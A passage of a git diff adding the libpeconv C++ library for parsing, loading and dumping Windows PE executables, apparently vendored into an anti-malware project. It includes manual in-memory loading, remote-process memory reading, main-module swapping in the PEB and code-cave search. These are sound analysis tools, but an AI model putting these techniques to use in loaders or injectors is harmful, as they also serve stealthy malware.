+ */ + bool update_entry_point_rva(IN OUT BYTE *pe_buffer, IN DWORD ep); + + /** + Get number of sections from the File Header. It does not validate if this the actual number. + */ + size_t get_sections_count( + IN const BYTE* buffer, + IN const size_t buffer_size + ); + + /** + Checks if the section headers are reachable. It does not validate sections alignment. + */ + bool is_valid_sections_hdr_offset(IN const BYTE* buffer, IN const size_t buffer_size); + + /** + Gets pointer to the section header of the given number. + */ + PIMAGE_SECTION_HEADER get_section_hdr( + IN const BYTE* pe_buffer, + IN const size_t buffer_size, + IN size_t section_num + ); + + /** + Fetch the PE Characteristics from the File Header. + */ + WORD get_file_characteristics(IN const BYTE* payload); + + /** + Check if the module is a DLL (basing on the Characteristcs in the header). + */ + bool is_module_dll(IN const BYTE* payload); + + /** + Fetch the DLL Characteristics from the Optional Header. + */ + WORD get_dll_characteristics(IN const BYTE* payload); + + /** + Set the PE subsystem in the header. + */ + bool set_subsystem(IN OUT BYTE* payload, IN WORD subsystem); + + /** + Get the PE subsystem from the header. + */ + WORD get_subsystem(IN const BYTE* payload); + + /** + Check if the PE has relocations Data Directory. + */ + bool has_relocations(IN const BYTE *pe_buffer); + + /** + Fetch the pointer to the .NET header (if exist). + */ + IMAGE_COR20_HEADER* get_dotnet_hdr( + IN const BYTE* pe_buffer, + IN size_t const buffer_size, + IN const IMAGE_DATA_DIRECTORY* dotNetDir + ); + + /** + Fetch section aligmenent from headers. Depending on the flag, it fetches either Raw Alignment or Virtual Alignment. + */ + DWORD get_sec_alignment(IN const BYTE* modulePtr, IN bool is_raw); + + /** + Change section aligmenent in headers. Depending on the flag, it sets either Raw Alignment or Virtual Alignment. 
+ */ + bool set_sec_alignment(IN OUT BYTE* pe_buffer, IN bool is_raw, IN DWORD new_alignment); + + /** + Get size of virtual section from the headers (optionaly rounds it up to the Virtual Alignment) + */ + DWORD get_virtual_sec_size( + IN const BYTE* pe_hdr, + IN const PIMAGE_SECTION_HEADER sec_hdr, + IN bool rounded //if set, it rounds it up to the Virtual Alignment + ); + + /** + Get the last section (in a raw or virtual alignment) + \param pe_buffer : buffer with a PE + \param pe_size : size of the given PE + \param is_raw : If true, give the section with the highest Raw offset. If false, give the section with the highest Virtual offset. + */ + PIMAGE_SECTION_HEADER get_last_section(IN const PBYTE pe_buffer, IN size_t pe_size, IN bool is_raw); + + /** + Calculate full PE size (raw or virtual) using information from sections' headers. WARNING: it drops an overlay. + \param pe_buffer : a buffer containing a PE + \param pe_size : the size of the given buffer + \param is_raw : If true, the Raw alignment is used. If false, the Virtual alignment is used. + */ + DWORD calc_pe_size( + IN const PBYTE pe_buffer, + IN size_t pe_size, + IN bool is_raw + ); + + /** + Walk through sections headers checking if the sections beginnings and sizes are fitting the alignment (Virtual or Raw) + \param buffer : a buffer containing a PE + \param buffer_size : the size of the given buffer + \param is_raw : If true, the Raw alignment is checked. If false, the Virtual alignment is checked. + */ + bool is_valid_sectons_alignment(IN const BYTE* buffer, IN const SIZE_T buffer_size, IN bool is_raw); + +}; // namespace peconv diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/pe_loader.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/pe_loader.h new file mode 100644 index 0000000..bc9d5dc --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/pe_loader.h @@ -0,0 +1,42 @@ +/** +* @file +* @brief Loading PE from a file with the help of the custom loader. 
+*/ + +#pragma once + +#include "pe_raw_to_virtual.h" +#include "function_resolver.h" + +namespace peconv { + /** + Reads PE from the given buffer into memory and maps it into vitual format. + (Automatic raw to virtual conversion). + If the executable flag is true, the PE file is loaded into executable memory. + If the relocate flag is true, applies relocations. Does not load imports. + Automatically allocates buffer of the needed size (the size is returned in outputSize). The buffer can be freed by the function free_pe_buffer. + */ + BYTE* load_pe_module(BYTE* dllRawData, size_t r_size, OUT size_t &v_size, bool executable, bool relocate); + + /** + Reads PE from the given file into memory and maps it into vitual format. + (Automatic raw to virtual conversion). + If the executable flag is true, the PE file is loaded into executable memory. + If the relocate flag is true, applies relocations. Does not load imports. + Automatically allocates buffer of the needed size (the size is returned in outputSize). The buffer can be freed by the function free_pe_buffer. + */ + BYTE* load_pe_module(const char *filename, OUT size_t &v_size, bool executable, bool relocate); + + /** + Loads full PE from the raw buffer in a way in which it can be directly executed: remaps to virual format, applies relocations, loads imports. + Allows for supplying custom function resolver. + */ + BYTE* load_pe_executable(BYTE* dllRawData, size_t r_size, OUT size_t &v_size, t_function_resolver* import_resolver=NULL); + + /** + Loads full PE from file in a way in which it can be directly executed: remaps to virual format, applies relocations, loads imports. + Allows for supplying custom function resolver. 
+ */ + BYTE* load_pe_executable(const char *filename, OUT size_t &v_size, t_function_resolver* import_resolver=NULL); + +};// namespace peconv diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/pe_mode_detector.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/pe_mode_detector.h new file mode 100644 index 0000000..0cbaff7 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/pe_mode_detector.h @@ -0,0 +1,46 @@ +/** +* @file +* @brief Detecting in which mode is the PE in the supplied buffer (i.e. raw, virtual). Analyzes PE features typical for particular modes. +*/ + +#pragma once + +#include + +#include "pe_hdrs_helper.h" + +namespace peconv { + + /** + check if the PE in the memory is in raw format + */ + bool is_pe_raw( + IN const BYTE* pe_buffer, + IN size_t pe_size + ); + + /** + check if Virtual section addresses are identical to Raw addresses (i.e. if the PE was realigned) + */ + bool is_pe_raw_eq_virtual( + IN const BYTE* pe_buffer, + IN size_t pe_size + ); + + /** + checks if the PE has sections that were unpacked/expanded in the memory + */ + bool is_pe_expanded( + IN const BYTE* pe_buffer, + IN size_t pe_size + ); + + /** + checks if the given section was unpacked in the memory + */ + bool is_section_expanded(IN const BYTE* pe_buffer, + IN size_t pe_size, + IN const PIMAGE_SECTION_HEADER sec + ); + +};// namespace peconv diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/pe_raw_to_virtual.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/pe_raw_to_virtual.h new file mode 100644 index 0000000..f351138 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/pe_raw_to_virtual.h @@ -0,0 +1,30 @@ +/** +* @file +* @brief Converting PE from raw to virtual format. +*/ + +#pragma once + +#include +#include + +#include "buffer_util.h" + +namespace peconv { + + /** + Converts a raw PE supplied in a buffer to a virtual format. 
+ If the executable flag is true (default), the PE file is loaded into executable memory. + Does not apply relocations. Does not load imports. + Automatically allocates buffer of the needed size (the size is returned in outputSize). The buffer can be freed by the function free_pe_module. + If the desired_base is defined (0 by default), it enforces allocation at the particular base. + */ + BYTE* pe_raw_to_virtual( + IN const BYTE* rawPeBuffer, + IN size_t rawPeSize, + OUT size_t &outputSize, + IN OPTIONAL bool executable = true, + IN OPTIONAL ULONGLONG desired_base = 0 + ); + +}; // namespace peconv diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/pe_virtual_to_raw.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/pe_virtual_to_raw.h new file mode 100644 index 0000000..fbecf3e --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/pe_virtual_to_raw.h @@ -0,0 +1,47 @@ +/** +* @file +* @brief Converting PE from virtual to raw format. +*/ + +#pragma once + +#include + +#include "buffer_util.h" + +namespace peconv { + + /** + Maps virtual image of PE to into raw. Automaticaly applies relocations. + Automatically allocates buffer of the needed size (the size is returned in outputSize). + \param payload : the PE in the Virtual format that needs to be converted into the Raw format + \param in_size : size of the input buffer (the PE in the Virtual format) + \param loadBase : the base to which the given PE was relocated + \param outputSize : the size of the output buffer (the PE in the Raw format) + \param rebuffer : if set (default), the input buffer is rebuffered and the original buffer is not modified. + \return a buffer of the outputSize, containing the Raw PE. The buffer can be freed by the function free_pe_module. 
+ */ + BYTE* pe_virtual_to_raw( + IN BYTE* payload, + IN size_t in_size, + IN ULONGLONG loadBase, + OUT size_t &outputSize, + IN OPTIONAL bool rebuffer=true + ); + + /* + Modifies raw alignment of the PE to be the same as virtual alignment. + \param payload : the PE in the Virtual format that needs to be realigned + \param in_size : size of the input buffer + \param loadBase : the base to which the given PE was relocated + \param outputSize : the size of the output buffer (the PE in the Raw format) + \return a buffer of the outputSize, containing the realigned PE. The buffer can be freed by the function free_pe_module. + */ + BYTE* pe_realign_raw_to_virtual( + IN const BYTE* payload, + IN size_t in_size, + IN ULONGLONG loadBase, + OUT size_t &outputSize + ); + +};//namespace peconv diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/peb_lookup.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/peb_lookup.h new file mode 100644 index 0000000..7a5112f --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/peb_lookup.h @@ -0,0 +1,40 @@ +/** +* @file +* @brief Functions for retrieving process information from PEB. +*/ + +#pragma once + +#include + +namespace peconv { + + /** + Gets handle to the given module via PEB. A low-level equivalent of `GetModuleHandleW`. + \param module_name : (optional) the name of the DLL loaded within the current process. If not set, the main module of the current process is used. + \return the handle of the DLL with given name, or, if the name was not given, the handle of the main module of the current process. + */ + HMODULE get_module_via_peb(IN OPTIONAL LPWSTR module_name = nullptr); + + + /** + Gets size of the given module via PEB. + \param hModule : (optional) the base of the module which's size we want to retrieve. If not set, the main module of the current process is used. + \return the size of the given module. 
+ */ + size_t get_module_size_via_peb(IN OPTIONAL HMODULE hModule = nullptr); + + /** + Sets the given module as the main module in the current PEB. + \param hModule : the module to be connected to the current PEB. + \return true if succeeded, false if failed + */ + bool set_main_module_in_peb(HMODULE hModule); + + /** + Gets the main module from the current PEB. + \return the main module connected to the current PEB. + */ + HMODULE get_main_module_via_peb(); +}; + diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/relocate.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/relocate.h new file mode 100644 index 0000000..7a7a2af --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/relocate.h @@ -0,0 +1,51 @@ +/** +* @file +* @brief Operating on PE file's relocations table. +*/ + +#pragma once + +#include + +namespace peconv { + + typedef struct _BASE_RELOCATION_ENTRY { + WORD Offset : 12; + WORD Type : 4; + } BASE_RELOCATION_ENTRY; + + class RelocBlockCallback + { + public: + RelocBlockCallback(bool _is64bit) + : is64bit(_is64bit) + { + } + + virtual bool processRelocField(ULONG_PTR relocField) = 0; + + protected: + bool is64bit; + }; + + // Processs the relocation table and make your own callback on each relocation field + bool process_relocation_table(IN PVOID modulePtr, IN SIZE_T moduleSize, IN RelocBlockCallback *callback); + + /** + Applies relocations on the PE in virtual format. Relocates it from the old base given to the new base given. + If 0 was supplied as the old base, it assumes that the old base is the ImageBase given in the header. 
+ \param modulePtr : a buffer containing the PE to be relocated + \param moduleSize : the size of the given PE buffer + \param newBase : a base to which the PE should be relocated + \param oldBase : a base to which the PE is currently relocated (if not set, the imageBase from the header will be used) + */ + bool relocate_module(IN BYTE* modulePtr, IN SIZE_T moduleSize, IN ULONGLONG newBase, IN ULONGLONG oldBase = 0); + + /** + Checks if the given PE has a valid relocations table. + \param modulePtr : a buffer containing the PE to be checked + \param moduleSize : the size of the given PE buffer + */ + bool has_valid_relocation_table(IN const PBYTE modulePtr, IN const size_t moduleSize); + +};//namespace peconv diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/remote_pe_reader.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/remote_pe_reader.h new file mode 100644 index 0000000..127a519 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/remote_pe_reader.h @@ -0,0 +1,93 @@ +/** +* @file +* @brief Reading from a PE module that is loaded within a remote process. +*/ + +#pragma once + +#include + +#include "pe_hdrs_helper.h" +#include "pe_virtual_to_raw.h" +#include "exports_mapper.h" +#include "pe_dumper.h" + +namespace peconv { + + bool fetch_region_info(HANDLE processHandle, BYTE* start_addr, MEMORY_BASIC_INFORMATION &page_info); + + /** + Fetch size of the memory region starting from the given address. + */ + size_t fetch_region_size(HANDLE processHandle, BYTE* start_addr); + + /** + Fetch the allocation base of the memory region with the supplied start address. + \param processHandle : handle of the process where the region of interest belongs + \param start_addr : the address inside the region of interest + \return the allocation base address of the memory region, or 0 if not found + */ + ULONGLONG fetch_alloc_base(HANDLE processHandle, BYTE* start_addr); + + /** + Wrapper over ReadProcessMemory. 
Requires a handle with privilege PROCESS_VM_READ. + If reading full buffer_size was not possible, it will keep trying to read smaller chunk, + decreasing requested size by step_size in each iteration. Returns how many bytes were successfuly read. + It is a workaround for errors such as FAULTY_HARDWARE_CORRUPTED_PAGE. + */ + size_t read_remote_memory(HANDLE processHandle, BYTE *start_addr, OUT BYTE* buffer, const size_t buffer_size, const SIZE_T step_size = 0x100); + + /** + Reads the full memory area of a given size within a given process, skipping inaccessible pages. + Requires a handle with privilege PROCESS_QUERY_INFORMATION. + step_size is passed to the underlying read_remote_memory. + */ + size_t read_remote_area(HANDLE processHandle, BYTE *start_addr, OUT BYTE* buffer, const size_t buffer_size, const SIZE_T step_size = 0x100); + + /** + Reads a PE header of the remote module within the given process. Requires a valid output buffer to be supplied (buffer). + */ + bool read_remote_pe_header(HANDLE processHandle, BYTE *moduleBase, OUT BYTE* buffer, const size_t bufferSize); + + /** + Reads a PE section with a given number (sectionNum) from the remote module within the given process. + The buffer of appropriate size is automatically allocated. After use, it should be freed by the function free_unaligned. + The size of the buffer is writen into sectionSize. + \param processHandle : the handle to the remote process + \param moduleBase : the base address of the module + \param sectionNum : number of the section to be read + \param sectionSize : the size of the read section (output) + \param roundup : if set, the section size is roundup to the alignment unit + \return a buffer containing a copy of the section. + */ + peconv::UNALIGNED_BUF get_remote_pe_section(HANDLE processHandle, BYTE *moduleBase, const size_t sectionNum, OUT size_t §ionSize, bool roundup = false); + + /** + Reads PE file from the remote process into the supplied buffer. 
It expects the module base and size to be given. + */ + size_t read_remote_pe(const HANDLE processHandle, BYTE *moduleBase, const size_t moduleSize, OUT BYTE* buffer, const size_t bufferSize); + + /** + Dumps PE from the remote process into a file. It expects the module base and size to be given. + \param outputFilePath : the path where the dump will be saved + \param processHandle : the handle to the remote process + \param moduleBase : the base address of the module that needs to be dumped + \param dump_mode : specifies in which format the PE should be dumped. If the mode was set to PE_DUMP_AUTO, it autodetects mode and returns the detected one. + \param exportsMap : optional. If exportsMap is supplied, it will try to recover destroyed import table of the PE, basing on the supplied map of exported functions. + */ + bool dump_remote_pe( + IN const char *outputFilePath, + IN const HANDLE processHandle, + IN BYTE *moduleBase, + IN OUT t_pe_dump_mode &dump_mode, + IN OPTIONAL peconv::ExportsMapper* exportsMap = nullptr + ); + + /** + Retrieve the Image Size saved in the header of the remote PE. + \param processHandle : process from where we are reading + \param start_addr : a base address of the PE within the given process + */ + DWORD get_remote_image_size(IN const HANDLE processHandle, IN BYTE *start_addr); + +}; //namespace peconv diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/resource_parser.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/resource_parser.h new file mode 100644 index 0000000..d9d85d1 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/resource_parser.h @@ -0,0 +1,25 @@ +/** +* @file +* @brief Parsing PE's resource directory. +*/ + +#pragma once +#include + +namespace peconv { + /** + A callback that will be executed by the function parse_resources when the Resource Entry was found. 
+ */ + typedef bool(*t_on_res_entry_found) ( + BYTE* modulePtr, + IMAGE_RESOURCE_DIRECTORY_ENTRY *root_dir, + IMAGE_RESOURCE_DATA_ENTRY *curr_entry + ); + + /** + A function walking through the Resource Tree of the given PE. On each Resource Entry found, the callback is executed. + \param modulePtr : pointer to the buffer with the PE in a Virtual format + \param on_entry : a callback function executed on each Resource Entry + */ + bool parse_resources(BYTE* modulePtr, t_on_res_entry_found on_entry); +}; diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/resource_util.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/resource_util.h new file mode 100644 index 0000000..8b02fd5 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/resource_util.h @@ -0,0 +1,34 @@ +/** +* @file +* @brief Functions related to manual retrieving of PE resources. +*/ + +#pragma once + +#include +#include "buffer_util.h" + +namespace peconv { + + const LPSTR RT_RCDATA_A = MAKEINTRESOURCEA(10); + + /** + Maps a resource with the given id + type and copies its raw content into the output buffer. + If out_size is not zero, it reads maximum out_size of bytes. If out_size is zero, it reads the full resource. + The actual read size is returned back in out_size. + Automatically allocates a buffer of the required size. + If hInstance is NULL, it search the resource in the current module. Otherwise, it search in the given module. + */ + peconv::ALIGNED_BUF load_resource_data(OUT size_t &out_size, const int res_id, const LPSTR res_type = RT_RCDATA_A, HMODULE hInstance = nullptr); + + /** + Free the buffer with PE Resources, mapped by the function load_resource_data. 
+ */ + void free_resource_data(peconv::ALIGNED_BUF buffer); + + /** + a helper function to get the module handle of the current DLL + */ + HMODULE get_current_module_handle(); + +}; //namespace peconv diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/util.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/util.h new file mode 100644 index 0000000..f5679d3 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/util.h @@ -0,0 +1,25 @@ +/** +* @file +* @brief Miscellaneous utility functions. +*/ + +#pragma once + +#include "file_util.h" +#include "resource_util.h" + +namespace peconv { + /** + Checks if the given buffer is fully filled with the specified character. + \param cave_ptr : pointer to the buffer to be checked + \param cave_size : size of the buffer to be checked + \param padding_char : the required character + */ + bool is_padding(const BYTE *cave_ptr, size_t cave_size, const BYTE padding_char); + + /** + Wrapper for GetProcessId - for a backward compatibility with old versions of Windows + */ + DWORD get_process_id(HANDLE hProcess); +}; + diff --git a/ai_anti_malware/libpeconv/libpeconv/src/buffer_util.cpp b/ai_anti_malware/libpeconv/libpeconv/src/buffer_util.cpp new file mode 100644 index 0000000..d0596c6 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/buffer_util.cpp @@ -0,0 +1,87 @@ +#include "peconv/buffer_util.h" + +#include + +// +// validate pointer: +// + +bool peconv::validate_ptr(IN const void* buffer_bgn, IN SIZE_T buffer_size, IN const void* field_bgn, IN SIZE_T field_size) +{ + if (buffer_bgn == nullptr || field_bgn == nullptr) { + return false; + } + BYTE* _start = (BYTE*)buffer_bgn; + BYTE* _end = _start + buffer_size; + + BYTE* _field_start = (BYTE*)field_bgn; + BYTE* _field_end = (BYTE*)field_bgn + field_size; + + if (_field_start < _start) { + return false; + } + if (_field_end > _end) { + return false; + } + return true; +} + 
+//----------------------------------------------------------------------------------- +// +// alloc/free unaligned buffers: +// + +//allocates a buffer that does not have to start from the beginning of the section +peconv::UNALIGNED_BUF peconv::alloc_unaligned(size_t buf_size) +{ + if (!buf_size) return NULL; + + UNALIGNED_BUF buf = (UNALIGNED_BUF) calloc(buf_size, sizeof(BYTE)); + return buf; +} + +void peconv::free_unaligned(peconv::UNALIGNED_BUF section_buffer) +{ + free(section_buffer); +} + +// +// alloc/free aligned buffers: +// + +peconv::ALIGNED_BUF peconv::alloc_aligned(size_t buffer_size, DWORD protect, ULONGLONG desired_base, bool is_x64) +{ + if (!buffer_size) return NULL; + ALIGNED_BUF buf = (ALIGNED_BUF)VirtualAlloc((LPVOID)desired_base, buffer_size, MEM_COMMIT | MEM_RESERVE, protect); + return buf; +} + +bool peconv::free_aligned(peconv::ALIGNED_BUF buffer, size_t buffer_size) +{ + if (buffer == nullptr) return true; + if (!VirtualFree(buffer, 0, MEM_RELEASE)) { +#ifdef _DEBUG + std::cerr << "Releasing failed" << std::endl; +#endif + return false; + } + return true; +} + +//----------------------------------------------------------------------------------- +// +// wrappers using appropriate buffer type according to the purpose: +// + +// allocate a buffer for PE module: +peconv::ALIGNED_BUF peconv::alloc_pe_buffer(size_t buffer_size, DWORD protect, ULONGLONG desired_base) +{ + return alloc_aligned(buffer_size, protect, desired_base); +} + +// Free loaded PE module +bool peconv::free_pe_buffer(peconv::ALIGNED_BUF buffer, size_t buffer_size) +{ + return peconv::free_aligned(buffer, buffer_size); +} + diff --git a/ai_anti_malware/libpeconv/libpeconv/src/caves.cpp b/ai_anti_malware/libpeconv/libpeconv/src/caves.cpp new file mode 100644 index 0000000..07c69d0 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/caves.cpp @@ -0,0 +1,139 @@ +#include "peconv/caves.h" +#include "peconv/pe_hdrs_helper.h" +#include "peconv/util.h" + +using namespace 
peconv; + +#ifdef _DEBUG +#include +#endif + +PBYTE peconv::find_ending_cave(BYTE*modulePtr, size_t moduleSize, const DWORD minimal_size, const DWORD req_charact) +{ + size_t sec_count = peconv::get_sections_count(modulePtr, moduleSize); + if (sec_count == 0) return nullptr; + + size_t last_sec = sec_count - 1; + PIMAGE_SECTION_HEADER section_hdr = peconv::get_section_hdr(modulePtr, moduleSize, last_sec); + if (section_hdr == nullptr) return nullptr; + if (!(section_hdr->Characteristics & req_charact)) return nullptr; + + DWORD raw_size = section_hdr->SizeOfRawData; + DWORD virtual_size = (DWORD)moduleSize - section_hdr->VirtualAddress; + + if (raw_size >= virtual_size) { +#ifdef _DEBUG + std::cout << "Last section's raw_size: " << std::hex << raw_size << " >= virtual_size: " << virtual_size << std::endl; +#endif + return nullptr; + } + DWORD cave_size = virtual_size - raw_size; + if (cave_size < minimal_size) { +#ifdef _DEBUG + std::cout << "Cave is too small" << std::endl; +#endif + return nullptr; + } + PBYTE cave_ptr = modulePtr + section_hdr->VirtualAddress + section_hdr->SizeOfRawData; + if (!validate_ptr(modulePtr, moduleSize, cave_ptr, minimal_size)) { +#ifdef _DEBUG + std::cout << "Invalid cave pointer" << std::endl; +#endif + return nullptr; + } + section_hdr->SizeOfRawData += minimal_size; //book this cave + return cave_ptr; +} + +PBYTE peconv::find_alignment_cave(BYTE* modulePtr, size_t moduleSize, const DWORD minimal_size, const DWORD req_charact) +{ + DWORD alignment = peconv::get_sec_alignment(modulePtr, true); + if (alignment == 0) return nullptr; + + size_t sec_count = peconv::get_sections_count(modulePtr, moduleSize); + for (size_t i = 0; i < sec_count; i++) { + PIMAGE_SECTION_HEADER section_hdr = peconv::get_section_hdr(modulePtr, moduleSize, i); + if (section_hdr == nullptr) continue; + if (!(section_hdr->Characteristics & req_charact)) continue; + + DWORD rem = section_hdr->SizeOfRawData % alignment; + if (rem == 0) continue; + + DWORD div = 
(section_hdr->SizeOfRawData / alignment) + 1; + DWORD new_size = div * alignment; + DWORD cave_size = new_size - section_hdr->SizeOfRawData; + if (cave_size < minimal_size) { +#ifdef __DEBUG + std::cout << "Cave is too small" << std::endl; +#endif + continue; + } + DWORD sec_start = section_hdr->PointerToRawData; + if (sec_start == 0) continue; + + DWORD sec_end = sec_start + section_hdr->SizeOfRawData; +#ifdef _DEBUG + std::cout << "section: " << std::hex << sec_start << " : " << sec_end << std::endl; +#endif + PBYTE cave_ptr = modulePtr + sec_end; + if (!validate_ptr(modulePtr, moduleSize, cave_ptr, minimal_size)) { +#ifdef _DEBUG + std::cout << "Invalid cave pointer" << std::endl; +#endif + continue; + } + section_hdr->SizeOfRawData += minimal_size; //book this cave + return cave_ptr; + } +#ifdef _DEBUG + std::cout << "Cave not found" << std::endl; +#endif + return nullptr; +} + +PBYTE peconv::find_padding_cave(BYTE* modulePtr, size_t moduleSize, const size_t minimal_size, const DWORD req_charact) +{ + size_t sec_count = peconv::get_sections_count(modulePtr, moduleSize); + for (size_t i = 0; i < sec_count; i++) { + PIMAGE_SECTION_HEADER section_hdr = peconv::get_section_hdr(modulePtr, moduleSize, i); + if (section_hdr == nullptr) continue; + if (!(section_hdr->Characteristics & req_charact)) continue; + + if (section_hdr->SizeOfRawData < minimal_size) continue; + + // we will be searching in the loaded, virtual image: + DWORD sec_start = section_hdr->VirtualAddress; + if (sec_start == 0) continue; + + DWORD sec_end = sec_start + section_hdr->SizeOfRawData; +#ifdef _DEBUG + std::cout << "section: " << std::hex << sec_start << " : " << sec_end << std::endl; +#endif + //offset from the end of the section: + size_t cave_offset = section_hdr->SizeOfRawData - minimal_size; + PBYTE cave_ptr = modulePtr + sec_start + cave_offset; + if (!validate_ptr(modulePtr, moduleSize, cave_ptr, minimal_size)) { +#ifdef _DEBUG + std::cout << "Invalid cave pointer" << std::endl; 
+#endif + continue; + } + bool found = false; + if (is_padding(cave_ptr, minimal_size, 0)) { + found = true; + } + //if the section is code, check also code padding: + if (section_hdr->Characteristics & IMAGE_SCN_MEM_EXECUTE) { + if (is_padding(cave_ptr, minimal_size, 0xCC)) { + found = true; + } + } + if (found) { + return cave_ptr; + } + } +#ifdef _DEBUG + std::cout << "Cave not found" << std::endl; +#endif + return nullptr; +} diff --git a/ai_anti_malware/libpeconv/libpeconv/src/delayed_imports_loader.cpp b/ai_anti_malware/libpeconv/libpeconv/src/delayed_imports_loader.cpp new file mode 100644 index 0000000..36b5eba --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/delayed_imports_loader.cpp @@ -0,0 +1,200 @@ +#include "peconv/delayed_imports_loader.h" +#include "peconv/imports_loader.h" + +#include + +IMAGE_DELAYLOAD_DESCRIPTOR* peconv::get_delayed_imps(IN const BYTE* modulePtr, IN const size_t moduleSize, OUT size_t &dir_size) +{ + dir_size = 0; + IMAGE_DATA_DIRECTORY *d_imps_dir = peconv::get_directory_entry(modulePtr, IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT); + if (!d_imps_dir) { + return nullptr; + } + BYTE* dimps_table = (BYTE*)((ULONGLONG) modulePtr + d_imps_dir->VirtualAddress); + const size_t min_size = sizeof(IMAGE_DELAYLOAD_DESCRIPTOR); + if (d_imps_dir->Size < min_size) { + return nullptr; + } + if (!peconv::validate_ptr((LPVOID)modulePtr, moduleSize, dimps_table, min_size)) { + return nullptr; + } + dir_size = d_imps_dir->Size; + return reinterpret_cast (dimps_table); +} + +template +bool parse_delayed_desc(BYTE* modulePtr, const size_t moduleSize, + const ULONGLONG img_base, + LPSTR lib_name, + const T_FIELD ordinal_flag, + IMAGE_DELAYLOAD_DESCRIPTOR *desc, + peconv::t_function_resolver* func_resolver +) +{ + ULONGLONG iat_addr = desc->ImportAddressTableRVA; + + if (iat_addr > img_base) iat_addr -= img_base; // it may be either RVA or VA + + ULONGLONG thunk_addr = desc->ImportNameTableRVA; + if (thunk_addr > img_base) thunk_addr -= img_base; 
// it may be either RVA or VA + + T_FIELD* record_va = (T_FIELD*)((ULONGLONG)modulePtr + iat_addr); + T_IMAGE_THUNK_DATA* thunk_va = (T_IMAGE_THUNK_DATA*)((ULONGLONG)modulePtr + thunk_addr); + + for (; *record_va != NULL && thunk_va != NULL; record_va++, thunk_va++) { + if (!peconv::validate_ptr(modulePtr, moduleSize, record_va, sizeof(T_FIELD))) { + return false; + } + if (!peconv::validate_ptr(modulePtr, moduleSize, thunk_va, sizeof(T_FIELD))) { + return false; + } + + T_FIELD iat_va = *record_va; + ULONGLONG iat_rva = (ULONGLONG)iat_va; + if (iat_va > img_base) iat_rva -= img_base; // it may be either RVA or VA +#ifdef _DEBUG + std::cout << std::hex << iat_rva << " : "; +#endif + T_FIELD* iat_record_ptr = (T_FIELD*)((ULONGLONG)modulePtr + iat_rva); + if (!peconv::validate_ptr(modulePtr, moduleSize, iat_record_ptr, sizeof(T_FIELD))) { + return false; + } + FARPROC hProc = nullptr; + if (thunk_va->u1.Ordinal & ordinal_flag) { + T_FIELD raw_ordinal = thunk_va->u1.Ordinal & (~ordinal_flag); +#ifdef _DEBUG + std::cout << std::hex << "ord: " << raw_ordinal << " "; +#endif + hProc = func_resolver->resolve_func(lib_name, MAKEINTRESOURCEA(raw_ordinal)); + } + else { + ULONGLONG name_rva = thunk_va->u1.AddressOfData; + if (name_rva > img_base) { + name_rva -= img_base; + } + PIMAGE_IMPORT_BY_NAME by_name = (PIMAGE_IMPORT_BY_NAME)((ULONGLONG)modulePtr + name_rva); + LPSTR func_name = reinterpret_cast(by_name->Name); + if (!peconv::is_valid_import_name(modulePtr, moduleSize, func_name)) { + continue; + } +#ifdef _DEBUG + std::cout << func_name << " "; +#endif + hProc = func_resolver->resolve_func(lib_name, func_name); + } + if (hProc) { + //rather than loading it via proxy function, we just overwrite the thunk like normal IAT: + *record_va = (T_FIELD) hProc; +#ifdef _DEBUG + std::cout << "[OK]\n"; +#endif + } + else { +#ifdef _DEBUG + std::cout << "[NOPE]\n"; +#endif + } + } + return true; +} +bool peconv::load_delayed_imports(BYTE* modulePtr, ULONGLONG moduleBase, 
t_function_resolver* func_resolver) +{ + const bool is_64bit = peconv::is64bit(modulePtr); + const size_t module_size = peconv::get_image_size(modulePtr); + default_func_resolver default_res; + if (!func_resolver) { + func_resolver = (t_function_resolver*)&default_res; + } + size_t table_size = 0; + IMAGE_DELAYLOAD_DESCRIPTOR* first_desc = get_delayed_imps(modulePtr, module_size, table_size); + if (!first_desc) { + return false; + } +#ifdef _DEBUG + std::cout << "OK, table_size = " << table_size << std::endl; +#endif + size_t max_count = table_size / sizeof(IMAGE_DELAYLOAD_DESCRIPTOR); + for (size_t i = 0; i < max_count; i++) { + IMAGE_DELAYLOAD_DESCRIPTOR* desc = &first_desc[i]; + if (!validate_ptr(modulePtr, module_size, desc, sizeof(IMAGE_DELAYLOAD_DESCRIPTOR))) break; + if (desc->DllNameRVA == NULL) { + break; + } + ULONGLONG dll_name_rva = desc->DllNameRVA; + if (dll_name_rva > moduleBase) { + dll_name_rva -= moduleBase; + } + char* dll_name = (char*)((ULONGLONG)modulePtr + dll_name_rva); + if (!validate_ptr(modulePtr, module_size, dll_name, sizeof(char))) continue; +#ifdef _DEBUG 